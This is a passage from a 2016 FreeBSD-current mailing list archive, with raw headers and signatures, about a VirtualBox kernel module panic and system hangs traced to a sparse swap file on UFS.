not sure whether this is a problem with the base system or the port= , > but this happens every time I boot with the module enabled. emulators/virtualbox-ose-kmod is causing the trouble and this problem is well known. To work around it, remove WITNESS option from kernel configuration for now. Jung-uk Kim --PLdIoFO9UNwmA4AlPfh7FMRoC2R6iB4vH-- --hvoBB77eSQMHm9FMFPWF3i9ssxIf1Xc5a Content-Type: application/pgp-signature; name="signature.asc" Content-Description: OpenPGP digital signature Content-Disposition: attachment; filename="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEbBAEBCAAGBQJXlmgeAAoJEHyflib82/FGQ9sH9iLncRO9VGtbQ6lZZARh54oQ J2eGKJvp1zSzExoNelgpF+ViQiEVkda90qOIL3p5evCM1EOflw6O9Q7Nvwvq+jQ9 FiGlsSxlqLNYNqVHj6mjURzA0ZbFUUdcsrO51zIy2LFUR/qQnRHibIpZAtiB/SMy MkcQizSeSIU1fKzA8wrmqCtEHcHVblJk/j9KzxqeMPNkCk/qnRKIpNJayiXWiU+j ZY7gosStBpokJL/cCSASrNDAvqCZeSyE0ngOms7colCqFm0gErwfGveL/7uUTiqG Z1/2NI67BC82rLMfHJko2YPV1WDXeMg2HA3ZCfLtQrI9kwmNGaAItzqOmusAKw== =XVJF -----END PGP SIGNATURE----- --hvoBB77eSQMHm9FMFPWF3i9ssxIf1Xc5a-- From owner-freebsd-current@freebsd.org Mon Jul 25 21:17:45 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id E7D2ABA4715 for ; Mon, 25 Jul 2016 21:17:45 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: from mail-it0-x242.google.com (mail-it0-x242.google.com [IPv6:2607:f8b0:4001:c0b::242]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id AEAC3129D; Mon, 25 Jul 2016 21:17:45 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: by mail-it0-x242.google.com with SMTP id f6so8313103ith.2; Mon, 25 Jul 2016 14:17:45 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=date:from:to:cc:subject:message-id:references:mime-version :content-disposition:in-reply-to:user-agent; bh=R8XH8iw9Nqtz6nYCWEDpz0FfrRfgJY6qqqZR1iDThM0=; b=kOjaiuCjGxAdtk9BdPqLt9DboyZBvtU0Hb1Afpg6Odakagc0BJh9EJIGEh8wey1B6r dES/K67Jz4fzXhkjooDU01V83OwbF+or37W834YtS8RJGhxZwm+zmkLJzb3DKUHBWE8j LiLMVty0+KFowl2H+y/IdAjtNSKupEpa7Mf4+sXMilS/nFeHkDZTNGTixCCrCdvrMU8f 1Q32rwtdqjDzkB8dgV1FEE0GsHZbxWwy3d9xkES9NvDIAtS4G3bp5QnnvchMJa+1McZj xc/0t62uyyX9vNBRBbSg1gXL1aE1JyrRY6OZJfGypV69OcnBH0M0k8G63dozAvpT6exs gqFg== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:cc:subject:message-id:references :mime-version:content-disposition:in-reply-to:user-agent; bh=R8XH8iw9Nqtz6nYCWEDpz0FfrRfgJY6qqqZR1iDThM0=; b=D+OmTnGpBBvh48biBvNq/ci15naVTPaiv2rk+HwfCm1VMyjPNUOhO+U3Vsi3e2y94j 8YgnFb2+idcS6EbnGPXDIIagf28UsOEN4+Ep2WO8xs3CJdyLOlnc1wvM8OPtds3JvFur F2VwgnbyoiU0svHOV70T9/jrBNgusA0eciBYIx/Thl5VSpVmxFwOimqdT/bGbwtmVcig nWfKh+JHtuzxcuqnUGSpIheMmcic+7lVXDv2EsvQzlurwcHk0yX58ODYoCpCdCa03wQs oSkaXW1Z7nO1T5xBdcaYdhhEDO+foot/8KMUTV3ljDPxiFwKfvq2Tp/v6+0cAA8PLiyR Hq5A== X-Gm-Message-State: AEkoouuS8TSoAHndUSbGOcfz1LanQzmxNb0mvjtTVPyx/P8kb3sK7mi3fi/jJ2pJzwu6Jg== X-Received: by 10.36.67.13 with SMTP id s13mr23260523itb.90.1469481464859; Mon, 25 Jul 2016 14:17:44 -0700 (PDT) Received: from gmail.com (c-98-216-247-110.hsd1.ma.comcast.net. [98.216.247.110]) by smtp.gmail.com with ESMTPSA id b66sm9593656itd.0.2016.07.25.14.17.43 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Mon, 25 Jul 2016 14:17:44 -0700 (PDT) Date: Mon, 25 Jul 2016 17:17:41 -0400 From: Randy Westlund To: Jung-uk Kim Cc: freebsd-current@freebsd.org Subject: Re: Panic when loading vboxdrv module Message-ID: <20160725211741.GA11099@gmail.com> References: <20160725191314.GA10757@gmail.com> <901dace9-299a-5b3c-dff1-038ed1c192fa@FreeBSD.org> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="mYCpIKhGyMATD0i+" Content-Disposition: inline In-Reply-To: <901dace9-299a-5b3c-dff1-038ed1c192fa@FreeBSD.org> User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 25 Jul 2016 21:17:46 -0000 --mYCpIKhGyMATD0i+ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jul 25, 2016 at 04:09:58PM -0400, Jung-uk Kim wrote: > If you feel adventurous, please drop the attached patch in > *emulators/virtualbox-ose/files* directory, and rebuild > *emulators/virtualbox-ose-kmod*. >=20 > JK >=20 > * Note the patch directory is emulators/virtualbox-ose/files, not > emulators/virtualbox-ose-kmod/files. > --- src/VBox/HostDrivers/Support/SUPDrvInternal.h.orig 2016-07-18 11:56:1= 9 UTC > +++ src/VBox/HostDrivers/Support/SUPDrvInternal.h > @@ -235,7 +235,7 @@ > # define SUPDRV_WITHOUT_MSR_PROBER > #endif > =20 > -#if 1 > +#if 0 > /** @def SUPDRV_USE_TSC_DELTA_THREAD > * Use a dedicated kernel thread to service TSC-delta measurement reques= ts. > * @todo Test on servers with many CPUs and sockets. */ With the patch, vboxdrv loads successfully. But when I start a VM, I get the following panic (after rebuilding virtualbox-ose as well): > vboxdrv: ffffffff82973020 VMMR0.r0 > vboxdrv: ffffffff82a92020 VBoxDDR0.r0 > vboxdrv: ffffffff82aaf020 VBoxDD2R0.r0 > panic: _mtx_lock_sleep: recursed on non-recursive mutex aiomtx @ /usr/src= /sys/kern/vfs_aio.c:996 >=20 > cpuid =3D 1 > KBD: stack backtrace: > db_trace_wrapper() at db_trace_wrapper+0x2b > vpanic() at vpanic+0x182 > kassert_panic() at kassert_panic+0x126 > __mtx_lock_sleep() at __mtx_lock_sleep+0x228 > __mtx_lock_flags() at __mtx_lock_flags+0x10d > aio_queue() at aio_queue+0x9d6 > amd64_syscall() at amd64_syscall+0x2db > Xfast_syscall() at Xfast_syscall+0xfb > --- syscall (465, FreeBSD ELF64, sys_aio_fsync), rip =3D 0x80119fa0a, rsp= =3D 0x7fffdf2abc98, rbp =3D 0x7fffdf2abcd0 --- > KDB: enter: panic > [ thread pid 14588 tid 101813 ] > Stopped at kdb_enter+0x3b: movq $0,kdb_why --mYCpIKhGyMATD0i+ Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXloH1AAoJEGaweXjzNsmpJWkH/j9oaIrzjmPha8o3/qwXFtM3 lrQ2b+nLOAAefgHB8RP/bi6+uYakUlqfWJD7NvwnGtcpc+2mhJUEDWOVZ0Q4rB9V gTan4Q6mFtziHQddVyFXC9bsBCwiUNp6U22DT5DWNdiBZbG4+FgWlEOrEu8hS1Xx RpFTULVq45B5CLazsi+hc+NyACi//gLTMBvRvEuqX6YVbA60UM+WyofcRxKzY9jR b7+IL6mT4+AIaydQLyJVEplSV8azTOUkVN9H9PnpCpWEFH/OERjGQzkwZaBR54Nr rZFp/sZpT8V8bm6DoTuAFLZY9R2GHVT2GC9/Fb5FY7DMkrFzKLeVGV+IuVr4BjQ= =2XJU -----END PGP SIGNATURE----- --mYCpIKhGyMATD0i+-- From owner-freebsd-current@freebsd.org Tue Jul 26 00:34:50 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 11E05BA3008 for ; Tue, 26 Jul 2016 00:34:50 +0000 (UTC) (envelope-from markmi@dsl-only.net) Received: from asp.reflexion.net (outbound-mail-211-168.reflexion.net [208.70.211.168]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id A60CA1AC9 for ; Tue, 26 Jul 2016 00:34:49 +0000 (UTC) (envelope-from markmi@dsl-only.net) Received: (qmail 31445 invoked from network); 26 Jul 2016 00:01:42 -0000 Received: from unknown (HELO mail-cs-02.app.dca.reflexion.local) (10.81.19.2) by 0 (rfx-qmail) with SMTP; 26 Jul 2016 00:01:42 -0000 Received: by mail-cs-02.app.dca.reflexion.local (Reflexion email security v7.90.6) with SMTP; Mon, 25 Jul 2016 20:00:55 -0400 (EDT) Received: (qmail 10188 invoked from network); 26 Jul 2016 00:00:54 -0000 Received: from unknown (HELO iron2.pdx.net) (69.64.224.71) by 0 (rfx-qmail) with (AES256-SHA encrypted) SMTP; 26 Jul 2016 00:00:54 -0000 X-No-Relay: not in my network X-No-Relay: not in my network Received: from [192.168.0.105] (ip70-189-131-151.lv.lv.cox.net [70.189.131.151]) by iron2.pdx.net (Postfix) with ESMTPSA id E4900B1E001; Mon, 25 Jul 2016 17:00:54 -0700 (PDT) From: Mark Millard Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable Subject: Re: seldom crashes on Dell E6330 with 12-CURRENT Message-Id: Date: Mon, 25 Jul 2016 17:00:59 -0700 To: FreeBSD Current , guru@unixarea.de Mime-Version: 1.0 (Mac OS X Mail 9.3 \(3124\)) X-Mailer: Apple Mail (2.3124) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 26 Jul 2016 00:34:50 -0000 Matthias Apitz guru at unixarea.de wrote on Mon Jul 25 16:10:52 UTC 2016 = : > On Monday, 25 July 2016 17:11:23 CEST, Eric van Gyzen wrote: >=20 > > What file system are you using?=20 > UFS; I followed the good instructions about new SSD disk = configuration; that's why I now have swap as plain file :-(=20 Unfortunately see = https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=3D206048 : 11.0-CURRENT -r293227 (and others) arm (rpi2/BeagleBone Black) amd64 = etc: swapfile usage hangs; swap partition works . As far as I know it still applies for the problems that can occur for = plain-file based swap files. The list of comments covers more than just = armv6 as having example failures. =3D=3D=3D Mark Millard markmi at dsl-only.net From owner-freebsd-current@freebsd.org Tue Jul 26 03:08:19 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 43BA8BA48D5 for ; Tue, 26 Jul 2016 03:08:19 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: from mail-qt0-x236.google.com (mail-qt0-x236.google.com [IPv6:2607:f8b0:400d:c0d::236]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 0F84C1698 for ; Tue, 26 Jul 2016 03:08:18 +0000 (UTC) (envelope-from rwestlun@gmail.com) Received: by mail-qt0-x236.google.com with SMTP id 52so110235003qtq.3 for ; Mon, 25 Jul 2016 20:08:18 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=date:from:to:cc:subject:message-id:references:mime-version :content-disposition:in-reply-to:user-agent; bh=P9IQYRYBpGfbmArjBylfGUNXnQgsP2NSAadkUE/a6J4=; b=qFyT9ROo3ysWVM6+c3xbGuD7D2gbmgAYx1v3kGRG4tivkm4hyezqvTgXb1anHNwbJ4 6oYc8tP7WY6VuQh6w1kgiMiZoC+cH1TKeOU7vsLTigGaguj744rtyqTzRtuODHNv+5OQ K5vjk/btH0MdTKCzMkX1ixL4kjhNPK4wXK9/hzPGFsOQce1uGxK28fnLHxeeFv2B6Lea u/6+f+tGu+Pbr0a7wJcO1QTjQeGFK5SdXHIjYdoURYBhhCAAsnYEEfwPq6ujpCtoXwQP GsmFZm5JZ4TexcmoesX/5lmhIYjFcHNBqzJ9qHJSRHQGHZOrhL3yMo7dsCFwYSI2R4/I 8kPw== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:date:from:to:cc:subject:message-id:references :mime-version:content-disposition:in-reply-to:user-agent; bh=P9IQYRYBpGfbmArjBylfGUNXnQgsP2NSAadkUE/a6J4=; b=dDr7qNVSuf/MBLSiobyHHF2CWQRynG+UnphJWymVnRG5iWGe2AMta+b8RtCLfn2Z0i +vf2aL0TjCzKF27kO0m2gbGBrkJ7VxJyNkQ2QWVQicANL77SnYidSqiJnLyLQ7Q+VwDr JTR8NdLMGNasB4w+PgCgPC3VmKIiygBjMcGqDEUS4WnN46SbF8fLAOdnefljRUL7/s/5 KK11nyItiIgtHOtcd6mrXnciKYIYPRcTGhbeFYLoBt5bB0o0Cf96Oz2U9p8f6kLJZgHM u9+jv1LSZ4WHZ9WPlWLD31ODzSb0biZHhp/PQkFa9fMK4Jyfv8bnEyRe++yAu2Troqr8 g4lQ== X-Gm-Message-State: AEkooutNzy5GGPVttL2jSsr5X+sFENagjlb1tQNiHLn7DdpwS4mzK02mbBAoATt82clgMQ== X-Received: by 10.200.47.92 with SMTP id k28mr34614462qta.50.1469502498130; Mon, 25 Jul 2016 20:08:18 -0700 (PDT) Received: from gmail.com (c-98-216-247-110.hsd1.ma.comcast.net. [98.216.247.110]) by smtp.gmail.com with ESMTPSA id r65sm10872652qka.29.2016.07.25.20.08.17 (version=TLS1_2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); Mon, 25 Jul 2016 20:08:17 -0700 (PDT) Date: Mon, 25 Jul 2016 23:08:15 -0400 From: Randy Westlund To: Jung-uk Kim Cc: freebsd-current@freebsd.org Subject: Re: Panic when loading vboxdrv module Message-ID: <20160726030815.GB12568@gmail.com> References: <20160725191314.GA10757@gmail.com> <92c7634b-8f19-eccd-75a0-68e5fd98e597@FreeBSD.org> <7875d0e7-6cbd-6184-3f34-a2fbd00788b1@niksun.com> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; protocol="application/pgp-signature"; boundary="61jdw2sOBCFtR2d/" Content-Disposition: inline In-Reply-To: <7875d0e7-6cbd-6184-3f34-a2fbd00788b1@niksun.com> User-Agent: Mutt/1.6.1 (2016-04-27) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 26 Jul 2016 03:08:19 -0000 --61jdw2sOBCFtR2d/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jul 25, 2016 at 07:43:32PM -0400, Jung-uk Kim wrote: > Oops, I meant INVARIANTS. Anyway, it should be fixed in r419083. I > understand you have a panic with aio(4) but that's a separate issue. >=20 > Jung-uk Kim Should I create a new PR for virtualbox and aio, or is this already known? --61jdw2sOBCFtR2d/ Content-Type: application/pgp-signature; name="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXltQfAAoJEGaweXjzNsmpm9cH/iFMWNCJcxBLQZFlPMhGYohC 7IcdSnPNN7lOfb5c/7zyVrow/DvEkuswYk0uejgkt35we7oBvlGVd6upJFkxhlrK ISA7HDm4o5P+dVGyFLbIFZA0giIC+23naMvyF3LTtXwF5y74OiCOj17FXEbyUFJ+ KPGJgmiF/jQHnNlmt5Ew8GLf3hIQz5p1muIstr1D7/VLhpMmwtoF9MwMUskERaBq bCbN73vbhOg/u3suu1C3Dxkz80vbQUSnTcHAucaigWz9smQr3pKLzNn4MpX8HGz5 qOzNDzs2H/4lHEm0IucGqjuTPq2sZV7p7Gutdg09mqdU9seepXTh44rD6kxrjLw= =Wt+V -----END PGP SIGNATURE----- --61jdw2sOBCFtR2d/-- From owner-freebsd-current@freebsd.org Tue Jul 26 05:50:25 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 8628BBA5613 for ; Tue, 26 Jul 2016 05:50:25 +0000 (UTC) (envelope-from guru@unixarea.de) Received: from ms-10.1blu.de (ms-10.1blu.de [178.254.4.101]) (using TLSv1 with cipher AES256-SHA (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 4A9831D04 for ; Tue, 26 Jul 2016 05:50:24 +0000 (UTC) (envelope-from guru@unixarea.de) Received: from [89.204.155.146] (helo=localhost.unixarea.de) by ms-10.1blu.de with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:32) (Exim 4.76) (envelope-from ) id 1bRvG0-0003BZ-S2; Tue, 26 Jul 2016 07:50:21 +0200 Received: from localhost.my.domain (c720-r292778-amd64 [127.0.0.1]) by localhost.unixarea.de (8.15.2/8.14.9) with ESMTPS id u6Q5oHBh003085 (version=TLSv1.2 cipher=DHE-RSA-AES256-GCM-SHA384 bits=256 verify=NO); Tue, 26 Jul 2016 07:50:17 +0200 (CEST) (envelope-from guru@unixarea.de) Received: (from guru@localhost) by localhost.my.domain (8.15.2/8.14.9/Submit) id u6Q5oFVp003084; Tue, 26 Jul 2016 07:50:15 +0200 (CEST) (envelope-from guru@unixarea.de) X-Authentication-Warning: localhost.my.domain: guru set sender to guru@unixarea.de using -f Date: Tue, 26 Jul 2016 07:50:15 +0200 From: Matthias Apitz To: Mark Millard Cc: FreeBSD Current Subject: Re: seldom crashes on Dell E6330 with 12-CURRENT Message-ID: <20160726055015.GB2981@c720-r292778-amd64> Reply-To: Matthias Apitz Mail-Followup-To: Matthias Apitz , Mark Millard , FreeBSD Current References: MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: X-Operating-System: FreeBSD 11.0-CURRENT r292778 (amd64) User-Agent: Mutt/1.5.24 (2015-08-30) X-Con-Id: 51246 X-Con-U: 0-guru X-Originating-IP: 89.204.155.146 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 26 Jul 2016 05:50:25 -0000 El día Monday, July 25, 2016 a las 05:00:59PM -0700, Mark Millard escribió: > Matthias Apitz guru at unixarea.de wrote on Mon Jul 25 16:10:52 UTC 2016 : > > > On Monday, 25 July 2016 17:11:23 CEST, Eric van Gyzen wrote: > > > > What file system are you using? > > UFS; I followed the good instructions about new SSD disk configuration; that's why I now have swap as plain file :-( > > Unfortunately see https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206048 : > > 11.0-CURRENT -r293227 (and others) arm (rpi2/BeagleBone Black) amd64 etc: swapfile usage hangs; swap partition works . > > As far as I know it still applies for the problems that can occur for plain-file based swap files. The list of comments covers more than just armv6 as having example failures. > Thanks for the pointer to the bug issue. I remembered, that I created the swap file as a so called sparse file (dd ... bs=1m seek=8192 count=0) and this is still visible with du(1): # du -sh /usr/swap01 ; ls -lh /usr/swap01 95M /usr/swap01 -rw------- 1 root wheel 8,0G 25 jul. 08:19 /usr/swap01 I have now unmounted the swap and re-created it with real blocks: # swapoff -a swapoff: removing /dev/md99 as swap device # dd if=/dev/zero of=/usr/swap01 bs=1m count=8192 8192+0 records in 8192+0 records out 8589934592 bytes transferred in 43.594277 secs (197042712 bytes/sec) # du -sh /usr/swap01 ; ls -lh /usr/swap01 8,0G /usr/swap01 -rw------- 1 root wheel 8,0G 26 jul. 07:24 /usr/swap01 I will first give this a try. If the crash rehappens, I will move it to a real freebsd-swap partition. While saying 'crash', I now remember that in the two cases which I named 'hard locked', the system was still alive in the sense of echoing typed chars, it was only impossible to start new commands or login on another console. This points too in the direction of a disk access or swap problem. Thanks matthias -- Matthias Apitz, ✉ guru@unixarea.de, ⌂ http://www.unixarea.de/ ☎ +49-176-38902045 "Wer übersieht, dass wir uns den anderen weggenommen haben und sie uns wiederhaben wollen, kann von den Kämpfen der letzten Tage keinen verstehen. Und kann natürlich auch keinen dieser Kämpfe bestehen." Hermann Kant in jW 1.10.1989 From owner-freebsd-current@freebsd.org Tue Jul 26 06:30:13 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id DA24CBA5DD1 for ; Tue, 26 Jul 2016 06:30:13 +0000 (UTC) (envelope-from markmi@dsl-only.net) Received: from asp.reflexion.net (outbound-mail-211-170.reflexion.net [208.70.211.170]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 8DA6F1172 for ; Tue, 26 Jul 2016 06:30:12 +0000 (UTC) (envelope-from markmi@dsl-only.net) Received: (qmail 29664 invoked from network); 26 Jul 2016 06:30:11 -0000 Received: from unknown (HELO mail-cs-01.app.dca.reflexion.local) (10.81.19.1) by 0 (rfx-qmail) with SMTP; 26 Jul 2016 06:30:11 -0000 Received: by mail-cs-01.app.dca.reflexion.local (Reflexion email security v7.90.6) with SMTP; Tue, 26 Jul 2016 02:30:11 -0400 (EDT) Received: (qmail 25019 invoked from network); 26 Jul 2016 06:30:11 -0000 Received: from unknown (HELO iron2.pdx.net) (69.64.224.71) by 0 (rfx-qmail) with (AES256-SHA encrypted) SMTP; 26 Jul 2016 06:30:11 -0000 X-No-Relay: not in my network X-No-Relay: not in my network Received: from [192.168.0.105] (ip70-189-131-151.lv.lv.cox.net [70.189.131.151]) by iron2.pdx.net (Postfix) with ESMTPSA id 117831C405F; Mon, 25 Jul 2016 23:30:03 -0700 (PDT) Content-Type: text/plain; charset=utf-8 Mime-Version: 1.0 (Mac OS X Mail 9.3 \(3124\)) Subject: Re: seldom crashes on Dell E6330 with 12-CURRENT From: Mark Millard In-Reply-To: <20160726055015.GB2981@c720-r292778-amd64> Date: Mon, 25 Jul 2016 23:30:09 -0700 Cc: FreeBSD Current Content-Transfer-Encoding: quoted-printable Message-Id: <32C7E9E5-A51C-4836-9939-0D000016808C@dsl-only.net> References: <20160726055015.GB2981@c720-r292778-amd64> To: Matthias Apitz X-Mailer: Apple Mail (2.3124) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 26 Jul 2016 06:30:14 -0000 On 2016-Jul-25, at 10:50 PM, Matthias Apitz wrote: >=20 > El d=C3=ADa Monday, July 25, 2016 a las 05:00:59PM -0700, Mark Millard = escribi=C3=B3: >=20 >> Matthias Apitz guru at unixarea.de wrote on Mon Jul 25 16:10:52 UTC = 2016 : >>=20 >>> On Monday, 25 July 2016 17:11:23 CEST, Eric van Gyzen wrote: >=20 >>>> What file system are you using?=20 >>> UFS; I followed the good instructions about new SSD disk = configuration; that's why I now have swap as plain file :-(=20 >>=20 >> Unfortunately see = https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=3D206048 : >>=20 >> 11.0-CURRENT -r293227 (and others) arm (rpi2/BeagleBone Black) amd64 = etc: swapfile usage hangs; swap partition works . >>=20 >> As far as I know it still applies for the problems that can occur for = plain-file based swap files. The list of comments covers more than just = armv6 as having example failures. >>=20 >=20 > Thanks for the pointer to the bug issue. I remembered, that I created > the swap file as a so called sparse file (dd ... bs=3D1m seek=3D8192 = count=3D0) and > this is still visible with du(1): >=20 > # du -sh /usr/swap01 ; ls -lh /usr/swap01 > 95M /usr/swap01 > -rw------- 1 root wheel 8,0G 25 jul. 08:19 /usr/swap01 >=20 > I have now unmounted the swap and re-created it with real blocks: >=20 > # swapoff -a > swapoff: removing /dev/md99 as swap device >=20 > # dd if=3D/dev/zero of=3D/usr/swap01 bs=3D1m count=3D8192 > 8192+0 records in > 8192+0 records out > 8589934592 bytes transferred in 43.594277 secs (197042712 bytes/sec) > # du -sh /usr/swap01 ; ls -lh /usr/swap01 > 8,0G /usr/swap01 > -rw------- 1 root wheel 8,0G 26 jul. 07:24 /usr/swap01 >=20 > I will first give this a try. If the crash rehappens, I will move it = to > a real freebsd-swap partition. FYI: All my uses and testing of swap files used such a dd command to = populate the file with blocks. I've never even tried a sparse file for = such a thing. My experience indicates that this will not remove the problem if the = swap file is in a file system on a partition with other file system = activity (at least in the same file system?). The only type of context that I've had a swap file work over lots of use = is when I used a whole partition containing just one UFS file system = that only had the swap file added after the UFS file system was created. = In other words: About the closest thing to being a swap partition that = is still file based. I've only done this on TARGET_ARCH=3Dpowerpc and = TARGET_ARCH=3Dpowerpc64. I tried it for them because TRIM was possible = in the context: it was a SATA context with SSDs, not a USB context. (I = did this during my very first FreeBSD experiments. I only learned later = of problems with other variations.) My other, later contexts do not have TRIM as possible (for example, USB) = and so I did not do that. It is these that I had troubles with and later = switched to using a swap partition instead. [I will not have access to the powerpc's for weeks.] >=20 > While saying 'crash', I now remember that in the two cases which I = named > 'hard locked', the system was still alive in the sense of echoing = typed > chars, it was only impossible to start new commands or login on = another > console. This points too in the direction of a disk access or swap = problem. >=20 > Thanks >=20 > matthias =3D=3D=3D Mark Millard markmi at dsl-only.net From owner-freebsd-current@freebsd.org Tue Jul 26 07:32:08 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 4716BBA59F9; Tue, 26 Jul 2016 07:32:08 +0000 (UTC) (envelope-from koobs.freebsd@gmail.com) Received: from mail-pa0-x232.google.com (mail-pa0-x232.google.com [IPv6:2607:f8b0:400e:c03::232]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 142EA1A3F; Tue, 26 Jul 2016 07:32:08 +0000 (UTC) (envelope-from koobs.freebsd@gmail.com) Received: by mail-pa0-x232.google.com with SMTP id ks6so69637244pab.0; Tue, 26 Jul 2016 00:32:08 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=sender:reply-to:subject:references:to:cc:from:message-id:date :user-agent:mime-version:in-reply-to:content-transfer-encoding; bh=28QWS4y+ZFOck9jqiUaSXfb3xijIV/LeQQ4kfbhXCk4=; b=sTx+4D8xjQfnZ4jH9paqulvdr0djCTb22gEgSzEPhXVBE9GxgKDNBw75mYRDRvaKyn CpztEuL9N57ZzdE3afph0M2n/hY6n3s3gWVygi31Vfnsak1e7mKuPzh/m5NMtPXsxxGv OD6mUy8V1Yo8cXI2tIqfKtBnxzmsjHz/1zmKY29f8QR5Fsqw+Hef/96hMQvq2a+9HY5T dH2NFf5al/68hP5rJtE3ErI78Aa3hIM902TjENIUsL8chqG4XIpeWTVsbb/H69Vd3Wn9 FTpo9lqfecHXtuyEuWGLiKvOnNQbGJPqOu+nwLj8ElVQTiDv7aUclsMcA3Og1tMnf1ra tWfg== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:sender:reply-to:subject:references:to:cc:from :message-id:date:user-agent:mime-version:in-reply-to :content-transfer-encoding; bh=28QWS4y+ZFOck9jqiUaSXfb3xijIV/LeQQ4kfbhXCk4=; b=iAYb6vrDxB7e9fpW7ED22/CebjTyOW3WNDFrK8b4gSZYwCbJ98eb0Ij0c8Jn6ZzQhv vS9dkazORPr6C7+s3aiBXOq3OGCQZxGPo6zSOX9lkT7uViXzr2Yo2F+IMc7ihFh0s6ZU I9m2sjHRQPHyWtcEbbCDbmDAKPZU/fxsIf5auxDcQ77Qr60xiPlTv7uPcb3VAM9itpQs K+GU0x516k67R5h2qCieowOBHetc4+v4g95FNORc0JSvOv/KNmUv7+H1Crj7wmwJ0Yne 